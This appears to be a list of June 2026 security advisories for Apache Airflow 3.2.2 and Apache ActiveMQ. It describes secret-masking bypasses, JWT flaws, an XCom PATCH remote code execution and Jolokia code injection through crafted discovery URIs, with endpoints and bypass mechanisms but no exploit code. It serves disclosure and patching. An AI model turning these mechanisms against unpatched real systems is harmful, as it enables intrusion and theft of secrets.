CVE-2026-42360	Jun 01, 2026	Apache Airflow 3.2.2: Bypass of Nested Sensitive Key Masking in Rendered Fields A bug in Apache Airflow's rendered-template field handling caused nested sensitive-key masking (e.g. nested `password` / `token` / `secret` / `api_key` keys inside a JSON template structure) to be bypassed when the rendered field exceeded `[core] max_templated_field_length`: Airflow stringified the structure before redaction, losing the nested key context, and persisted the plaintext value into `rendered_fields`. An authenticated UI/API user with permission to read rendered template fields could harvest secret values intended to be masked. Affects deployments where Dag authors pass structured JSON to operators with nested sensitive keys. This is a variant of `CWE-200` previously addressed for the user-registered `mask_secret()` patterns in CVE-2025-68438; that fix did not cover the nested sensitive-keyword allowlist. Users who already upgraded for CVE-2025-68438 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the nested-key path.	AirFlow
CVE-2026-42358	Jun 01, 2026	Apache Airflow Variable Masker Recursion Depth Bypass Vulnerable Secret Exposure A bug in Apache Airflow's Variable response masker caused nested-key redaction (triggered by secret-suffixed key names like `password`, `token`, `secret`, `api_key`) to be bypassed when the JSON value's nesting depth exceeded the shared secrets masker's recursion limit: the masker returned the original nested item before checking the sensitive key name. An authenticated UI/API user with Variable read permission could harvest plaintext secret values stored under sensitive keys nested deep enough to exceed the masker's depth cap. Affects deployments that store sensitive values inside deeply-nested JSON Variables. This is a residual gap in the fix for CVE-2026-32690 (which covered shallower nesting via `max_depth=1`); the depth-limit boundary itself was not raised, so the same key-name bypass pattern reappears beyond the recursion cap. Users who already upgraded for CVE-2026-32690 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the deep-nesting path.	AirFlow
CVE-2026-42359	Jun 01, 2026	Apache Airflow 3.2.2 XCom PATCH RCE Exploit via Reserved Keys A bug in Apache Airflow's XCom PATCH endpoint `PATCH /api/v2/xcomEntries/{key}` allowed an authenticated UI/API user with XCom write permission on a Dag to set XCom entries under reserved key names (e.g. `return_value`) that the matching POST endpoint already validated against `FORBIDDEN_XCOM_KEYS`. The endpoint also accepted serialized payload shapes the triggerer's deserializer treats as code; combined, this allowed RCE on the triggerer when the affected task next deferred. Affects deployments where untrusted users have XCom write permission on Dags that defer to the triggerer. This is a fix-bypass of CVE-2026-33858: PR #64148 added the `FORBIDDEN_XCOM_KEYS` validator only on the POST/set path; the PATCH path was not covered. Users who already upgraded for CVE-2026-33858 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the PATCH-path bypass.	AirFlow
CVE-2026-45360	Jun 01, 2026	Apache Airflow Scheduler RCE via Arbitrary Class Import (pre-3.2.2) Apache Airflow's scheduler-side deadline-reference decoder (`SerializedCustomReference.deserialize_reference`) imported and dispatched arbitrary class paths drawn from DAG-author-controlled serialized state without an allowlist or plugin-registry gate. A DAG author whose code reaches the scheduler the default on single-host deployments where the DAG bundle is importable from the scheduler process could embed a custom `DeadlineReference` whose serialized form named an attacker-controlled module path, causing the scheduler to `import_string(...)` and instantiate that class with a live SQLAlchemy session attached. Affects deployments where DAG-author code is less trusted than the scheduler process. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.	AirFlow
CVE-2026-45426	Jun 01, 2026	Apache Airflow LogServer JWT Lstrip Auth Bypass (3.2.1) Exploitation requires the attacker to already be an authenticated Airflow worker holding a valid Log-server JWT issued for at least one Dag. Apache Airflow's Log server authorized JWT tokens against Dag IDs by applying Python's `str.lstrip()` to the requested path segment when verifying the JWT's `sub` claim. `str.lstrip()` strips any of a set of characters from the left (not a prefix), so a JWT issued for a Dag named e.g. `dag_a` would authorize log access to any other Dag whose name began with any subset of the characters `{d, a, g, _}` (e.g. `dag_attacker`, `aaaa_target`, `_dag_secret`). Such an authenticated worker could enumerate and read worker logs of other Dags whose names happened to share that character-class prefix, leaking task output and error traces beyond the documented per-Dag isolation boundary. Affects deployments relying on per-Dag log-access scoping (multi-team, shared-executor, shared-worker topologies). Users are advised to upgrade to `apache-airflow` 3.2.2 or later.	AirFlow
CVE-2026-46764	Jun 01, 2026	Apache Airflow 3.2.2 Fix: EventLogs API ID Enumeration Priv Escalation The Event Log detail endpoint `GET /api/v2/eventLogs/{event_log_id}` in Apache Airflow fetched audit-log rows directly by numeric ID after only the generic Audit Log permission check, while the collection endpoint `GET /api/v2/eventLogs` applied per-Dag scoping. An authenticated UI/API user with audit-log read permission for one Dag could retrieve audit-log entries for any other Dag by guessing or enumerating the numeric event log ID. Affects deployments that rely on per-Dag audit-log scoping. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.	AirFlow
CVE-2026-48726	Jun 01, 2026	Apache Airflow JWT Retained After Logout in FAB/Keycloak (v<3.2.2) A bug in Apache Airflow's auth manager logout handling left previously-issued JWT tokens valid after the user clicked logout in the UI: the logout flow for `FabAuthManager` and `KeycloakAuthManager` did not actually reach the underlying `revoke_token()` call, so the JWT remained accepted by the API server until its natural expiry. An attacker holding a previously-issued JWT for a logged-out user could continue to make authenticated API calls as that user. Affects deployments configured with `FabAuthManager` or `KeycloakAuthManager` (the bug does not affect SimpleAuthManager). This is a residual gap in the fix for CVE-2025-57735, which addressed cookie-side invalidation in PR #57992 / PR #61339 but did not cover the provider-side `revoke_token()` reachability in the FAB / Keycloak code paths. Users who already upgraded for CVE-2025-57735 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the FAB / Keycloak logout paths.	AirFlow
CVE-2026-49298	Jun 01, 2026	Apache Airflow 3.2.2+ JWT Leakage in KubernetesExecutor (CVE-202649298) A bug in Apache Airflow's KubernetesExecutor caused JWT tokens used by worker pods to authenticate against the Execution API to be passed to the worker container as command-line arguments visible in the pod spec. An authenticated UI/API user with Kubernetes read-only access to the cluster (e.g. `pods/get` in the Airflow namespace) could harvest the JWT from `kubectl describe pod` output and then call state-mutating Execution API endpoints triggering Dag runs, clearing runs, reading or writing Variables / Connections / XComs as if they were a running task. Affects deployments using the `KubernetesExecutor`. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. This is the airflow-core half of the same vulnerability addressed by [CVE-2026-27173](https://www.cve.org/CVERecord?id=CVE-2026-27173), which shipped the apache-airflow-providers-cncf-kubernetes side of the fix. Deployments that already upgraded `apache-airflow-providers-cncf-kubernetes` to 10.17.0 or later per the CVE-2026-27173 advisory should additionally upgrade `apache-airflow` to 3.2.2 or later to close the core-side surface the two fixes are complementary, not duplicates.	AirFlow
CVE-2026-42253	Jun 01, 2026	Apache ActiveMQ Web (5.19.7/6.2.6) XSS via MessageServlet header injection Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache ActiveMQ, Apache ActiveMQ Web. The MessageServlet in the ActiveMQ web console API copies every JMS message property into an HTTP response header without any validation. This can allow overwriting and injecting security headers by setting them on JMS messages that are returned by the servlet. This issue affects Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ Web: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue. The MessageServlet has now been deprecated and disabled by default.	ActiveMQ
CVE-2026-42588	Jun 01, 2026	Apache ActiveMQ <5.19.7 / <6.2.6 Code Injection via Jolokia JMX Bridge Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter using the "masterslave:// " URL which can allow loading a Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue.	ActiveMQ
CVE-2026-45505	Jun 01, 2026	Apache ActiveMQ Broker Code Injection via Jolokia before5.19.7/6.0-6.2.6 Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ. Non-parenthesized discovery wrappers such as `masterslave:vm://...,...` and `static:vm://...` incorrectly pass validation allowing bypass of fix in CVE-2026-34197. Original description from CVE-2026-34197. Apache ActiveMQ exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery UR that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue.	ActiveMQ
CVE-2026-46605	Jun 01, 2026	Apache ActiveMQ Auth Bypass <=5.19.6, <=6.2.5 Removes Destinations Incomplete authorization by Apache ActiveMQ server before versions v6.2.6 and v5.19.7 allows authenticated connections to remove existing destinations with proper permissions. This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version v6.2.6 or v5.19.7, which fixes the issue.	ActiveMQ
CVE-2026-49157	Jun 01, 2026	Apache ActiveMQ Jolokia Permission Escalation (5.19.6, <6.2.6) Incorrect Default Permissions vulnerability in Apache ActiveMQ. This issue affects Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. The default Jolokia authorization settings granted non-admin (low-privilege) web-login accounts access to Jolokia operations which allowed executing broker management operations meant for admins such as addQueue and removeQueue. Users are recommended to upgrade to version 6.2.6 or 5.19.7, which fixes the issue.	ActiveMQ